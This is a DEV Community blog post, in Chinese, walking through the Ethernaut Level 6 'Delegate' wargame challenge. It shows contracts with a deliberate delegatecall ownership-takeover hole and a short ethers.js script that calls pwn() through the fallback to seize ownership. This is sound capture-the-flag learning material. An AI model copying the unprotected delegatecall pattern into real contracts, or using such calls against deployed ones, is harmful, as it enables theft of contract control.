DEV Community

bin2chen
bin2chen

Posted on

Ethernaut系列-Level 6(Delegate)

LEVEL 6 (Delegate)

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Delegate {

  address public owner;

  constructor(address _owner) public {
    owner = _owner;
  }

  function pwn() public {
    owner = msg.sender;
  }
}

contract Delegation {

  address public owner;
  Delegate delegate;

  constructor(address _delegateAddress) public {
    delegate = Delegate(_delegateAddress);
    owner = msg.sender;
  }

  fallback() external {
    (bool result,) = address(delegate).delegatecall(msg.data);
    if (result) {
      this;
    }
  }
}
Enter fullscreen mode Exit fullscreen mode

通关要求

获取owner

要点

delegatecall使用的是调用方的storage
delegatecall的注意事项有很多,这里有篇新出炉(2022-05-21)的史上最大bug奖金,可以去了解下,文章中间有描述proxy的一些要点。

https://medium.com/immunefi/wormhole-uninitialized-proxy-bugfix-review-90250c41a43a

解题思路

直接javascript调用即可

  it("attacks", async function () {
    //代理,不能直接调用await levelContract.pwd(),会找到方法,abi没有
    const contract = await ethers.getContractAt(
      "Delegate",
      levelContract.address,
      player
    );
    await contract.pwn();
  });
Enter fullscreen mode Exit fullscreen mode

Top comments (1)

Collapse
 
frantz profile image
Frantz

第六个错了